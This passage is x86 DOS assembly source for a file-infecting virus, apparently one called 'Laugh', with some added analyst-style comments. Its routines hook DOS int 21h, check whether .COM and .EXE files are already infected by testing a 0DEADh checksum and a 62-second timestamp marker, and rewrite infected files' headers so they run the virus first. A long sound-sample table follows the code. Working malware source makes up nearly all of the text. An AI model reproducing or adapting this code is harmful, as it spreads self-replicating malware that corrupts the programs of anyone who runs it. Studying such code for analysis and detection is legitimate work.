                jc      PopRet                  ; no, do nothing
                call    ReadHeader              ; read exe-header
                jc      NoVir                   ; error ?
                xor     ax,cx                   ; entire header read
                jne     NoVir                   ; no, not infected
                                                ; (ax is 0 from here on)
                cmp     Signature,5a4dh         ; signature = 'MZ' ?
                jne     NoVir                   ; no, not infected
                cmp     HeaderSize,ax           ; headersize = 0 ?
                jne     NoVir                   ; no, not infected
                cmp     CheckSum,0DEADh         ; checksum = DEAD hex
                jne     NoVir                   ; no, not infected
                mov     dl,0                    ; flag 0: already complete
                call    StoreHandle
                mov     dx,VirusSize            ; seek to end of virus
                jmp     short Infected
NoVir:          xor     dx,dx
Infected:       xor     cx,cx                   ; go to end of virus if file
                mov     ax,4200h                ; is infected
                call    DOS
PopRet:         pop     ds                      ; restore registers
                pop     dx
                pop     cx
                pop     bx
                pop     ax
                popf
Ret2:           retf    2                       ; return
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
; Small int 21h helpers that share one tail by falling through each other.
; All take the file handle in bx and return whatever the real int 21h
; returns (including the carry flag).
;   EndOfFile   ax=4202h, cx:dx=0   -> dx:ax = file length
;   TopOfFile   ax=4200h, cx:dx=0   -> pointer at start of file
;   WriteHeader ah=40h, cx=1Eh, dx=0 -> write 1Eh bytes from ds:0
;   ReadHeader  ah=3Fh, cx=1Eh, dx=0 -> read 1Eh bytes to ds:0
;   Zero2       clears dx, then DOS (caller supplies ax and cx)
;   DOS         calls the previous int 21h handler: PUSHF followed by a call
;               through OldInt21 (defined outside this excerpt), then a near
;               return
EndOfFile:      mov     ax,4202h                ; go to end of file
                jmp     short Zero1

TopOfFile:      mov     ax,4200h                ; go to top of file
Zero1:          xor     cx,cx
                jmp     short Zero2

WriteHeader:    mov     ah,40h                  ; write exe-header to file
                jmp     short Hdr

ReadHeader:     mov     ah,3fh                  ; read exe-header from file
Hdr:            mov     cx,1eh                  ; 15 words: MZ fields + ComSize
Zero2:          xor     dx,dx

DOS:            pushf                           ; call original interrupt
                call    cs:OldInt21
                ret
|
|||
|
|
|||
|
; FindHandle - search the handle table for a handle value.
; The table at Handle (defined outside this excerpt) is scanned as 8 entries
; of 3 bytes: a handle word followed by a flag byte.
; In:   bx = handle value to look for (0 looks for a free slot)
; Out:  CF clear, bx = offset of the matching entry, or
;       CF set when no entry matches (bx then points past the last entry)
; ax and cx are preserved.
FindHandle:     push    ax
                push    cx
                mov     ax,bx
                mov     bx,offset Handle
                mov     cx,8
NotFound:       cmp     ax,cs:[bx]
                je      Found                   ; equal compare leaves CF clear
                inc     bx                      ; next 3-byte entry
                inc     bx
                inc     bx
                loop    NotFound
                stc                             ; not in the table
Found:          pop     cx
                pop     ax
                ret
|
|||
|
|
|||
|
; HandleFree - test whether the handle table has an unused entry.
; Out: CF clear if an entry with handle word 0 exists, CF set otherwise.
; bx is preserved (POP does not change the flags set by FindHandle).
HandleFree:     push    bx
                xor     bx,bx                   ; search for handle value 0
                call    FindHandle
                pop     bx
                ret
|
|||
|
|
|||
|
; StoreHandle - record a handle in the first free entry of the handle table.
; In:  bx = handle, dl = flag byte (the callers in this excerpt pass 1 for a
;      file that still needs UpdateHeader on close, 0 for a file already
;      carrying the marker header, or a flag copied from another entry)
; bx is preserved. The carry result of FindHandle is not examined here.
StoreHandle:    push    bx                      ; saved for the caller
                push    bx                      ; second copy: the value to store
                xor     bx,bx                   ; find an entry with handle word 0
                call    FindHandle
                pop     cs:[bx]                 ; entry.handle = handle
                mov     cs:[bx+2],dl            ; entry.flag = dl
                pop     bx
                ret
|
|||
|
|
|||
|
; CheckName - decide whether a file name ends in .COM or .EXE.
; In:  ds:dx = zero-terminated file name
; Out: CF clear if the three characters after the dot are COM or EXE
;      (letters are upper-cased with AND 0DFh before comparing),
;      CF set otherwise
; ax, cx, si and di are preserved.
; ah counts the dots seen since the last backslash; the name qualifies only
; when that count is exactly 1. At most 100h characters are scanned.
CheckName:      push    ax                      ; check for .exe or .com
                push    cx                      ; save registers
                push    si
                push    di
                xor     ah,ah                   ; point found = 0
                mov     cx,100h                 ; max length filename = 100h
                mov     si,dx                   ; si = start of filename
                cld
NxtChr:         lodsb                           ; get byte
                or      al,al                   ; 0 ?
                je      EndName                 ; yes, check extension
                cmp     al,'\'                  ; \ ?
                je      Slash                   ; yes, point found = 0
                cmp     al,'.'                  ; . ?
                je      Point                   ; yes, point found = 1
                loop    NxtChr                  ; next character
                jmp     short EndName           ; check extension
Slash:          xor     ah,ah                   ; point found = 0
                jmp     NxtChr                  ; next character
Point:          inc     ah                      ; point found = 1
                mov     di,si                   ; di = start of extension
                jmp     NxtChr                  ; next character
EndName:        cmp     ah,1                    ; exactly one point found ?
                jne     NotExe                  ; no, not an exe-file
                mov     si,di                   ; si = start of extension
                lodsw                           ; first 2 characters
                and     ax,0dfdfh               ; uppercase
                mov     cx,ax
                lodsb                           ; 3rd character
                and     al,0dfh                 ; uppercase
                cmp     cx,04f43h               ; extension = .com ? ('CO')
                jne     NotCom
                cmp     al,04dh                 ; 'M'
                je      ChkRet                  ; equal compare leaves CF clear
NotCom:         cmp     cx,05845h               ; extension = .exe ? ('EX')
                jne     NotExe
                cmp     al,045h                 ; 'E'
                je      ChkRet
NotExe:         stc                             ; set carry flag
ChkRet:         pop     di                      ; restore registers
                pop     si
                pop     cx
                pop     ax
                ret                             ; return
|
|||
|
|
|||
|
; UpdateHeader - called by Close for a file that received a copy of the body
; when it was created. It turns the first 1Eh bytes of the file into an MZ
; header that starts execution at Main.
; In:  bx = file handle, ds = cs
; Steps:
;   1. read 1Eh bytes at file offset VirusSize (the start of the program's
;      own content) into the header area at ds:0
;   2. no 'MZ' there (InfectCom): build a header from scratch and record the
;      length of the original content in ComSize;
;      'MZ' there (InfectExe): keep the program's header values, set
;      ComSize = -1, move ExeSS up by VirusSize/10h + HeaderSize paragraphs
;      and raise MinMem/MaxMem by 20h (MaxMem is set to 0FFFFh on overflow)
;   3. common part: ReloCount = 0, HeaderSize = 0, CheckSum = 0DEADh,
;      entry point 0:Main, PartPage/PageCount recomputed from the file length
;   4. write the header at offset 0 and set the seconds field of the file
;      time to 1Fh
; Analyst note: the values written in steps 3 and 4 are the markers the
; Open, Find and FindFCB handlers test for - 'MZ' with HeaderSize 0 and
; CheckSum 0DEADh at the start of the file, and a timestamp whose seconds
; field is 1Fh ("62 seconds").
UpdateHeader:   mov     ax,4200h                ; position read/write pointer
                xor     cx,cx                   ; at the end of the virus
                mov     dx,VirusSize
                call    DOS
                call    ReadHeader              ; read original exe-header
                cmp     Signature,5a4dh
                je      InfectExe
InfectCom:      mov     Signature,5a4dh         ; 'MZ'
                mov     ReloOffset,01ch
                mov     OverlayNr,0
                mov     ExeSS,(VirusSize-100h)/10h
                mov     ExeSP,0fffeh
                call    EndOfFile               ; dx:ax = file length
                sub     ax,VirusSize            ; length without the body
                sbb     dx,0
                mov     ComSize,ax
                mov     cx,10h
                div     cx                      ; ax = paragraphs, dx = remainder
                sub     dx,1                    ; CF=1 only when the remainder was 0
                mov     dx,0ff2h+20h            ; MOV leaves the flags untouched,
                sbb     dx,ax                   ; so SBB consumes that carry
                mov     MinMem,dx
                jmp     WriteIt
InfectExe:      mov     ComSize,-1
                mov     ax,(VirusSize/10h)
                add     ax,HeaderSize
                add     ExeSS,ax
                add     MinMem,20h
                add     MaxMem,20h
                jnc     MaxOk                   ; no overflow: keep the new MaxMem
WriteIt:        mov     MaxMem,0ffffh
MaxOk:          mov     ReloCount,0
                mov     HeaderSize,0
                mov     CheckSum,0DEADh
                mov     ExeCS,0
                mov     ExeIP,offset Main
                call    EndOfFile               ; dx:ax = file length
                mov     cx,200h
                div     cx                      ; ax = full pages, dx = bytes in last page
                mov     PartPage,dx
                add     dx,-1                   ; CF=1 unless the remainder was 0
                adc     ax,0                    ; count the partial page as well
                mov     PageCount,ax
                call    TopOfFile
                call    WriteHeader             ; write header at the top of
                jc      InfErr                  ; the virus
                mov     ax,5700h                ; get file date/time (time in cx)
                call    DOS
                mov     ax,5701h                ; set it again with the seconds
                or      cl,1fh                  ; field forced to 1Fh
                call    DOS
InfErr:         ret
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Data to generate the Laugh sound
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
SampleData db 249,220,204,102, 51, 51,116,102,227, 6, 28,216,243,129,131, 54
|
|||
|
db 140,204,226,227, 51, 18, 25,184, 98,199,131, 30, 25,204,204,193
|
|||
|
db 230, 79, 28,248, 98,241,142,199, 51, 24,228,249,179, 44,221,241
|
|||
|
db 54, 71,254, 46, 8,255,139,227, 59,196,241, 49,198,208,243,205
|
|||
|
db 193,115,155,131,206, 46, 14,177,176, 51,205,129,158, 54,142,113
|
|||
|
db 144,115,140,135, 56,240, 55,205,131,188,124, 51,199,195,156,120
|
|||
|
db 25,199,129,156, 76, 49,197,195, 28,110, 57,231,129,156,120, 25
|
|||
|
db 197,145,156,108, 25,102,201,158, 46, 12,113,224,231,141,163, 60
|
|||
|
db 76, 25,227,104,228,229,131,131,154,157, 24,102,114,206, 71,193
|
|||
|
db 241, 14,229,140, 55,196,241,125, 89, 27, 29,195,240,157, 30, 68
|
|||
|
db 193,246, 57,135, 99, 56,238, 25,134,196,241,230, 24, 6, 24,176
|
|||
|
db 231, 51,142,113,178,113,205, 55,160, 67, 57,198,143,177,147, 56
|
|||
|
db 115,135, 89,193,157, 56,103,156,112,115,102,217,227, 30, 76,121
|
|||
|
db 156,241, 35, 71, 56,227,155, 12,103,190, 56,115,198,105,150, 97
|
|||
|
db 142, 28,113,230, 50, 60,185,201,156, 76,248,231, 13,204,248,100
|
|||
|
db 199, 39, 28,113,198, 70, 71, 54,124,219, 99,135, 48, 62, 25,131
|
|||
|
db 112,196, 31, 14, 51,225,225, 56,110, 1,206, 51,147,110, 15,129
|
|||
|
db 252,127, 7,113,184, 29,135,192,236, 62, 7,227,224,127, 31, 3
|
|||
|
db 176,240, 63,143, 1,216,248, 29,143,131,184,248, 63, 15,131,112
|
|||
|
db 248,102, 28,134,225,208,238, 61, 12,199,161,220, 90, 25,199, 35
|
|||
|
db 184,244, 51,139, 67, 56,164,119, 22,134,115,104,238, 60,140,226
|
|||
|
db 217,206,105, 25,204,179, 28,211, 51,137, 38, 57,180,199, 50, 76
|
|||
|
db 115, 44,199, 50,156,230, 73,142,101,152,230, 89,142,116,153,230
|
|||
|
db 217,158,109,153,227, 65,142, 54, 14,241,176,102,198, 17,199, 26
|
|||
|
db 14,204,105, 59, 49,131,156,153,135,135, 19, 24, 30, 59,134, 99
|
|||
|
db 188, 48,195,112,198, 57,216,198, 44,110, 76,205, 50, 76,176,110
|
|||
|
db 19, 49,215, 48,222,199, 15,153,102,107, 38,195, 50,108, 51, 44
|
|||
|
db 113,228,201, 60,204,241,204,184,100,204,198, 57,227, 32, 30,127
|
|||
|
db 193,156,113,184,155, 24,201,201, 48,108,231,134, 70,112,102, 28
|
|||
|
db 103,115,177,118, 49,135, 19, 57,177,155, 31, 28,121,248,230, 31
|
|||
|
db 134, 96,248,230, 60,102,115, 51, 28, 51, 25,137,153,140,223,153
|
|||
|
db 197,198, 92, 46,115, 99,243,115, 25,179, 57,153,177,217,248,207
|
|||
|
db 76,204,243, 51, 27, 60,201,140,115, 28, 99, 51,137,227, 56,127
|
|||
|
db 19,185,222,115,241,230, 31,129,224,252, 15, 7,225,248, 62, 15
|
|||
|
db 131,224,120, 62, 7,129,240,120, 30, 7,129,224,124, 62,135,135
|
|||
|
db 145,240,241, 62, 60,143, 15,145,225,228,120,124, 15, 15, 3,227
|
|||
|
db 228,120,124, 31, 27,131,227, 96,252,108,159, 13,147,163,176,116
|
|||
|
db 118, 14, 7,193,224,248, 60, 31, 7,195, 96,232,108, 28, 13,131
|
|||
|
db 147,241,240,116, 62, 14,135,193,240,248, 62, 15, 14,192,225,216
|
|||
|
db 152, 63, 27, 15,195,193,248,124, 63, 15, 7,224,240,254, 30, 14
|
|||
|
db 227,192,238, 60, 30,227,224,231,143, 67,172,121,158, 51,144,112
|
|||
|
db 230, 88,207,193,179, 59,135, 99,198, 12,204,241,219, 7, 19,240
|
|||
|
db 228,110, 31,133,193, 48,120,230, 44,205,225,158, 54, 49,166,120
|
|||
|
db 220, 19,140,131,176,116, 79,131,129,204,124, 31, 3,193,249,204
|
|||
|
db 140,150, 38, 72,199,153,152,248,126,142, 79,131,131,248,190, 31
|
|||
|
db 15,195,241,120,236, 96,204,143, 14, 57, 57,248,110, 62,103, 33
|
|||
|
db 216,248, 57, 31, 6,102,120,207, 28,216, 14, 6, 99, 96,204, 60
|
|||
|
db 121, 51, 67,137,207, 17,156, 57, 30, 11,198,230, 51, 51,157,179
|
|||
|
db 148, 96,247,113,192,204,206, 15, 35,152, 28, 30, 38,224,248,153
|
|||
|
db 206,227,225,113,142, 67,152,152, 89, 56,131,134,242, 56,227, 28
|
|||
|
db 23,131,120, 62, 15,225,248, 63, 7,193,240,126, 15,129,224,124
|
|||
|
db 31, 7,192,248, 62, 15,131,224,248, 62, 15,131,224,248, 60, 15
|
|||
|
db 135,208,248,121, 31, 15, 33,225,228, 60, 30, 71,195,200,248,124
|
|||
|
db 15,135,193,248,248, 31, 31,131,225,240, 62, 31, 3,131,240,120
|
|||
|
db 59, 15, 3,176,102, 55, 14,195,112,236, 55, 15,195,112,252, 55
|
|||
|
db 143,195,248,240, 63,143, 3,184,249, 27,199,161,252, 57, 31,195
|
|||
|
db 193,252, 60, 31, 99,192,242, 60, 79, 25,230,121,207,177,206, 62
|
|||
|
db 199, 24,240, 30, 51,192,240,252, 27,143,161,240,126, 30,135,192
|
|||
|
db 248, 60, 31,135,192,248,126, 15,135,129,196,184, 47, 13,195,216
|
|||
|
db 126, 27,135,201,226, 28, 70, 13,226,112,124, 71, 3,231,188, 78
|
|||
|
db 30, 24,227,241,234, 62, 15,161,248, 62, 15, 7,112, 90, 99,112
|
|||
|
db 230, 25,147,225,240,110, 61,198,240,116, 29, 23,103, 48,240, 58
|
|||
|
db 47,143,113,206, 51,198,192,126, 62, 15, 7, 97,236, 62, 31, 7
|
|||
|
db 240,254, 63, 15,195,240,190, 31,143,128,248, 62, 63,143, 99,152
|
|||
|
db 243, 60, 31, 7,129,216, 28, 7, 12,211,188,124, 7, 39,192,116
|
|||
|
db 119, 14,195,156,120,188, 7,195,192,239, 31,131,196,120,220, 19
|
|||
|
db 204,120,147,248, 89,129,216,223,140,252,253,143, 60,237,143, 28
|
|||
|
db 207,142,120,223, 30,241,254, 57,227,252, 99,139,177,158, 46,133
|
|||
|
db 248,242, 14,199,192,251, 31, 2,236,249, 31,115,228, 29,139,160
|
|||
|
db 236, 89, 7, 99,228, 57,159, 33,236,120, 15, 35,100, 57,155, 53
|
|||
|
db 196,104,143, 51,102,184,141, 16,230,124,199, 57,226, 28,199,144
|
|||
|
db 230, 60, 67,153,242, 28,231,200,115, 30, 97,204,121,143, 49,230
|
|||
|
db 60,199,136,115,143, 1,198, 60,103,140,113,142, 56,211, 30,120
|
|||
|
db 240, 30, 60, 62, 77,207,153,225,124,124,153,118,126, 28,193,230
|
|||
|
db 60,135,129,242, 60,103,135,112,124, 31,140,112,238,120,227,184
|
|||
|
db 159,142,112,238, 57,145,231, 9,199,217,134,100,108, 3,163,248
|
|||
|
db 110,207,136, 97,199, 32,231, 63,135,136,242,102, 52,217,180,113
|
|||
|
db 198,112,227, 57,199, 4,193,204,115,142, 35, 12,219,156,118, 92
|
|||
|
db 203, 24, 99,128,241, 60, 39,204, 57, 31, 36,201,157, 19,230,108
|
|||
|
db 205,159, 99, 46,237,217, 51, 39,204, 28, 7, 12,120, 28,115,206
|
|||
|
db 124,142, 51,178, 60, 57,158, 62, 99, 12,153,209, 28,226,140, 51
|
|||
|
db 195, 24,243,188,230,217,227,144,240,158, 19,134,112, 79,200,241
|
|||
|
db 63,198,225,231,145,226,126, 79,129,243, 60, 79,129,240,120, 31
|
|||
|
db 3,192,240, 62, 15,193,240,120, 31, 3,225,240, 62, 31, 3,224
|
|||
|
db 240, 63, 15, 3,224,240, 63, 31, 7,225,240,126, 63, 7,225,248
|
|||
|
db 126, 31,135,225,220,110, 29,227,112,207, 27, 7,124,111, 28,241
|
|||
|
db 190, 60,227,100, 76,243, 60, 71,152,224,248, 63,135,227,248,126
|
|||
|
db 28,135,129,224,248, 63, 31,131,145,240,124, 47, 15,227,240,126
|
|||
|
db 31,131,224,248, 62, 31,198,241,220, 59, 15, 49,224, 56,143, 17
|
|||
|
db 199,185,248,126, 31,133,224,248, 62, 59,135, 96,252, 60, 23,197
|
|||
|
db 192,248, 60, 31, 49,196,241,216, 51,153,195,141,140,140, 62, 71
|
|||
|
db 102,248,190, 61,199,144,226, 62, 51,129,225,252, 62, 19,100,230
|
|||
|
db 49,140,115, 28, 3,160,224, 60, 71,131,226,248,156, 51,131,113
|
|||
|
db 248, 59,143,137,198, 56, 46, 29,193,240,230, 61,199, 57,230, 56
|
|||
|
db 215, 23, 38,120,230, 57,198, 35,198,108,141,148,113, 57,226, 57
|
|||
|
db 199,120,254, 15, 99,248, 70,197,200, 59, 31,225,248,191, 7,195
|
|||
|
db 232,126, 31, 3,240,252, 61,143,225,204,127, 14, 99,252,115,143
|
|||
|
db 227,204,119,143, 49,206, 60,199, 56,121,142,112,227,140,113,143
|
|||
|
db 199,216, 60,199, 33,248,121,143, 1,198, 57,198,204,227,156,224
|
|||
|
db 126, 30, 67,227, 56, 62, 29,143, 25,200,230, 30, 99,204,113, 14
|
|||
|
db 49,131, 92,197,206,120,238, 17,200,121, 7, 25,196, 24,222, 7
|
|||
|
db 0,112, 98, 61,142, 99,252, 63, 15,140,236,198,115, 70, 78,224
|
|||
|
db 220, 51,134,112, 78, 55,135,112,230, 56,254, 49,195,152,124,103
|
|||
|
db 35,182,113,133,225,188, 14,131,182, 62,121, 51, 7, 44,227, 25
|
|||
|
db 223, 24,228, 79,199,192,124, 15, 0,226,120,153, 49,202, 26, 39
|
|||
|
db 113,240,187, 31,225,240,117, 12,200,232,230, 51, 39,140,241, 29
|
|||
|
db 25,200,113,155,153, 62, 30, 3,168,113, 30, 1,195, 48, 76,127
|
|||
|
db 142, 99, 29,175, 57,142,195,243,220, 24,142, 3,136,248, 30, 19
|
|||
|
db 70,240,123, 59,199,120,227, 56,115, 15,199,248,248, 31, 3,193
|
|||
|
db 216, 57,142,113,206, 57,177,183,121,185, 3,248,206, 11,156,115
|
|||
|
db 129,156, 55,145,216, 95, 19,241,190,103,227,248, 31,139,240,118
|
|||
|
db 31,193,216,127, 7,113,126, 29,199,248,127, 15,224,252, 63,195
|
|||
|
db 184,255, 12,227,252, 51,142,240,206, 57,195,152,115, 12,227,156
|
|||
|
db 115,142,113,206, 56,199, 56,227, 28, 97,140,121,198, 57,231, 28
|
|||
|
db 227,156,115,143, 56,199, 14,120,143,134,120, 79, 14,120,223, 15
|
|||
|
db 222, 51,227, 29,193,252,103,135,152,142, 12,228,114, 59,152,204
|
|||
|
db 224, 55, 25,241,156,100,199, 57,185, 28,199,204,113,159, 24,198
|
|||
|
db 7, 2, 57,207, 12,113,198, 56,249,193,220,115, 7, 3,225,240
|
|||
|
db 30,208,226, 28, 97,192, 56,193, 67, 51, 49,142,207,140,240,142
|
|||
|
db 49,227,156,103,131, 57,142, 99,226, 60, 15,128,240, 30, 7,145
|
|||
|
db 249, 14, 1,224, 61,131,240,115, 14, 65,248,121, 7,160,230, 63
|
|||
|
db 195,220, 63,135,240,158, 25,195, 24,231, 24, 99,156, 49,206,115
|
|||
|
db 135, 57,200,156,103, 48,113,142,112,198, 59,195, 24,231, 14,113
|
|||
|
db 156, 27,196,112,231, 61,241,220,127,134,113,220, 29,199, 55,127
|
|||
|
db 15,225,252, 31,135,248, 31, 15,231,156,103, 14,227,252, 51,152
|
|||
|
db 61, 6,120,207, 3,248,158, 7,240, 62, 67,224,124, 15,224,252
|
|||
|
db 143,192,241, 31,129,226, 62, 7,192,252, 31,129,248, 63, 7,240
|
|||
|
db 124, 15,193,248, 63, 7,224,254, 31,193,248, 63, 7,240,254, 15
|
|||
|
db 193,252, 63,131,240, 63, 7,224,126, 31,193,252, 63,131,248,190
|
|||
|
db 7,241,124, 31,227,252, 63,195,248, 63,199,240,125,199,216,120
|
|||
|
db 227, 14, 48,248, 15,128,252, 31,195,248,103, 3,241,220, 7,195
|
|||
|
db 248,127,135,240,126, 15,224,252, 31,129,248, 63, 7,240,120, 15
|
|||
|
db 128,240, 63, 15,224,254, 31,193,248, 31, 3,225,246, 31,195,220
|
|||
|
db 63,131,240, 63,131,224,126, 7,224,252, 31,195,252, 62, 7,248
|
|||
|
db 124, 15,177,248, 15, 3,240,254, 7,128,248, 15, 1,248, 30, 7
|
|||
|
db 192,124, 15,129,242, 59,131,192,116, 30, 3,232,126, 7,224,254
|
|||
|
db 7,192,252,103, 3,152,244, 23, 3,224, 60, 7,194,188, 7,129
|
|||
|
db 252, 47, 7,176,126, 15,224,252, 25,194,241, 57,199,112,112, 15
|
|||
|
db 1,248, 31,135,240,255, 15,225,248, 31,131,248,124, 3,240,124
|
|||
|
db 15,129,240, 31, 3,224,125, 7,160,126, 15,192,230, 28,227,136
|
|||
|
db 120, 7,176,244, 30,193,240, 61, 7,176,246, 14, 1,200, 28, 3
|
|||
|
db 128, 60, 7,134,120, 79,129,248,127, 7,230,120,199,152,225, 14
|
|||
|
db 115,192, 57,199, 28,115, 7, 25,254, 78,231, 59,221,200, 15,204
|
|||
|
db 156,152, 14,236,252,136,142,236,204,136, 76,204,249,144, 25,147
|
|||
|
db 114,100,118,111,145, 39,191,249, 19,247, 36,127,152, 19,254,136
|
|||
|
db 159,176, 7,254, 1,127,192, 31,252, 1,255,128, 31,230, 65,254
|
|||
|
db 0,127,216, 19,254, 1,127, 32, 15,248, 1,255,192, 31,248, 3
|
|||
|
db 254, 0,255,192, 31,248, 1,255,128, 31,224, 7,252, 9,190, 96
|
|||
|
db 15,236, 9,255, 0,159,176, 7,251, 2,127,128, 31,216, 11,252
|
|||
|
db 129,191,144, 15,252, 3,255,128, 63,228, 13,254, 0,255,240, 7
|
|||
|
db 254, 1,191,192, 31,252, 1,255, 0,127,248, 19,127,129, 63,228
|
|||
|
db 15,254, 0, 63,224, 13,254, 34, 55,228, 73,254,100,223,124,201
|
|||
|
db 191,224, 25,179, 32, 79,236,137,255,192, 79,254, 0,255,200, 23
|
|||
|
db 249, 32,155,108,130,102, 76,200,204,222, 4,166,251, 19, 32, 31
|
|||
|
db 236,140,236,204,108,204,153, 20,217,153, 25,179, 32,118,249,166
|
|||
|
db 219, 32, 23,108,146,108,200,111,230, 70,236,195, 63, 36, 71,201
|
|||
|
db 153, 59, 36,219,178,110,236,130, 93,194,102,249, 32,207,228, 66
|
|||
|
db 123,146, 59, 51, 38,153, 50,219,100,251,153,157,154,100, 99, 54
|
|||
|
db 108,195, 50,121,182,217,166,125, 50, 79, 54, 73,178,204,214,108
|
|||
|
db 147, 51, 33,147,108,200,155,177, 37,179,102, 3,237,140,154,136
|
|||
|
db 155,246, 68,255,236,137, 19, 63,204,153,191,144, 19,254, 64, 79
|
|||
|
db 252, 4,255,128, 63,240, 7,255, 19,119,233, 19, 51, 34, 55,120
|
|||
|
db 2,110,201, 63,220,139,230, 98,127,140,102,243,201,155,216, 7
|
|||
|
db 243, 19,124,204,137,190, 3,246,115, 51, 38,100,219, 96, 59, 62
|
|||
|
db 68,155,200,159,236,201,178,100, 73, 51, 19,153,140,155, 49, 19
|
|||
|
db 236,131,127,241, 3,252,205,222, 25,153,255,145, 62, 3,102, 76
|
|||
|
db 217, 31,204, 31,153,191,112, 63,177,187,204, 76,119,112, 29,196
|
|||
|
db 27,243, 38,204,199, 51, 54, 76,157,230, 77,217,144, 63,228, 79
|
|||
|
db 100,178,100,205,143,236, 25,147,120,129,248, 3,252,146,220,132
|
|||
|
db 216,157,217,183, 51, 35,147,205, 36,216, 25,155, 50,101,147,147
|
|||
|
db 38,196,105, 50, 71,199, 28,216,115, 48,205,179, 38,216, 60,179
|
|||
|
db 97,230,109,147,110, 38,121, 48,227, 64,204,198, 7, 14,108, 76
|
|||
|
db 184,240,195,239,134,115, 55,137, 15,184, 38,108, 12, 25,204,104
|
|||
|
db 243, 97,147,199, 39,152, 54,125, 49,243,179,102,205,204,155, 54
|
|||
|
db 126, 89, 60,217,102,195, 39,131, 79, 7,156, 38,121, 48,112,217
|
|||
|
db 225,159,227, 19, 12,150, 67, 54, 77,188,153, 60,250,108,155,108
|
|||
|
db 61,200,134, 79, 46,192,221, 3,255, 17,240,255,240, 62, 13,254
|
|||
|
db 19,178,223,128,204, 39,209, 44,153,225,180, 29,225, 60, 63,194
|
|||
|
db 120, 63, 1,248,188, 15,113,116, 27, 7, 51,204,115, 30,230, 59
|
|||
|
db 133,241, 60, 7,145,236,206,195,184,222, 3,137,242, 60,140, 99
|
|||
|
db 228,241,159, 23, 68,216,249, 15, 17,134,199, 65,126, 63, 7,216
|
|||
|
db 254, 31,227,232, 59,143,226,254, 55,135,241,188,101,199, 57,135
|
|||
|
db 198,112,159, 31,195,248,158, 71,249,199,145,240,248, 15,103,204
|
|||
|
db 19,141,195, 56,143,129,252, 7,167,241, 61,140,225,156, 3,136
|
|||
|
db 114, 30, 49,204,240,118, 48,195, 30, 71,192,121, 23, 1,248,198
|
|||
|
db 48,236, 49,156,241, 12,143,130,120,254, 15,226,184,251, 19,217
|
|||
|
db 253, 39,155, 98, 45,144,204, 55,155,113,159, 39, 97,242,187, 6
|
|||
|
db 244,195, 60,102,217,131, 38, 51,129,196,198, 12,224,198,125,100
|
|||
|
db 147,201, 53,159, 99, 60, 27, 97,188,142, 55,128,241,204,198,109
|
|||
|
db 130, 25,229,152,121,147, 49,140,153, 36,194,115, 24,198,121, 39
|
|||
|
db 152,243, 55, 19,198,126, 25,201,236,247, 25,196,120,141, 36,243
|
|||
|
db 46, 49,152,242, 12,195,199, 61,143,136,217,142,103, 56,205,129
|
|||
|
db 144, 25,135,185,156, 63,152,202, 59,135, 55,137,230,122,108,220
|
|||
|
db 61,184,206,102, 62,102, 31,142,153,231,211,206,225,231,151,105
|
|||
|
db 246,199,241,249,143,195,246,159,147,223,142,209,251,143,227,157
|
|||
|
db 159, 99,207, 25,199, 24,126,143,230,120,158,113,218, 63,199,240
|
|||
|
db 237,142,131,159, 57,230,120,238, 63,227,152,231,142,115, 30,115
|
|||
|
db 140,249,230,117,227,156,251,140,227,188,119,152,241, 26, 96,206
|
|||
|
db 97,135, 61,199,159, 57,103,188,103, 24,241,248,115, 56,230, 6
|
|||
|
db 227,188,115,204,124, 31,141,193,214,115,198,119,135, 49,142, 60
|
|||
|
db 199, 48,115, 28,227,156,113,140,113,198, 24,198, 56,115, 26, 33
|
|||
|
db 205,204,131, 51, 31, 12,206, 60, 51,152, 49,206, 99,199, 51,140
|
|||
|
db 205,142, 60, 51,152,224,228,227,153, 49,198,198,227, 51,143, 14
|
|||
|
db 134, 54,118, 56,152,252, 99,227,185,207,143,198,103, 51,142,156
|
|||
|
db 159, 28,224,113,179,140,228,204, 39, 71,113,156,100,228,225,163
|
|||
|
db 137,204,158,103, 49,115, 12,193,204,199,139,204,204, 51,163, 26
|
|||
|
db 56,204,225,198, 27,211,120,255, 46,225,239, 31,135, 92,111, 27
|
|||
|
db 147,156,114,229,147,142, 49,204,103,142, 57,156,152,236, 28,131
|
|||
|
db 179,113,198, 32,238, 53, 15, 29,241,120,247, 62, 53, 25,158, 48
|
|||
|
db 11,153, 54, 15, 28,230, 28,241,220,241,206,225,175, 27,134,102
|
|||
|
db 103, 24,249,220,102,204,243, 51, 51,140,204,166, 51,103, 57,153
|
|||
|
db 147,103,104,206,121,204, 99,204,123, 60, 25, 38, 51, 98,218,123
|
|||
|
db 22, 70, 28,219, 44,147, 76,192,227,200, 49,205,164,219,154,102
|
|||
|
db 23, 54, 78, 60,218,100,216,210,100,241,228,231,201,167, 57,140
|
|||
|
db 54, 15,206, 51, 47, 35,136,201,153, 35,140,115,134, 58,115,102
|
|||
|
db 120,236,204,153,163,120,198, 51,152, 54,204,225,147,101,201, 51
|
|||
|
db 13,193,178, 62, 77,195, 52,207,202,204,120,193,142,108,209,227
|
|||
|
db 28, 97,147, 19,152, 56,227,142, 92,240,199, 30, 48,241,207, 25
|
|||
|
db 108,157,109,199,155, 28, 97,155, 39, 28,241,205, 30, 24,226,199
|
|||
|
db 28, 49,225,134, 56,229,154,108, 97,207, 62, 56,231, 14,124,200
|
|||
|
db 54, 76,227,156, 56,227,143, 12,104,231, 28,179,103, 60,249,227
|
|||
|
db 135, 28,120,227, 6, 24,115,139, 56, 56,199,134, 56,115,199, 60
|
|||
|
db 153,204,222,108,241,195, 30, 60, 49,199,142, 24,112,227,134,115
|
|||
|
db 51,155, 28,113,205,134,120,242, 99,143, 30,113,154, 44,249,231
|
|||
|
db 150,124,113,241,158, 25, 98,206, 92,179,231,143, 56,227,166, 12
|
|||
|
db 32,199, 48,105,147, 25,156,108,204, 28, 51, 39,198,153,176,224
|
|||
|
db 252,216,103, 30, 71,205,131, 1,204,217,145,114, 60, 62,125, 60
|
|||
|
db 31, 30, 76,158, 22,108,217, 25,176,204,158, 55,137,140,220,104
|
|||
|
db 226,204,105,241,204,201,227,204,201,227,140,203,195,156,207,199
|
|||
|
db 28,199,195,140,199,195,156,199,231,140,199,195,156,207,206,121
|
|||
|
db 159, 38, 57,153,142,121,153,156,241,145,140,241,179,153,241,178
|
|||
|
db 204,209,131,153,227, 38,217,205,151, 28,198,103, 59, 25, 50, 77
|
|||
|
db 153, 46,121,140, 39, 49,140, 51, 50,102, 76,115,198, 12, 99,156
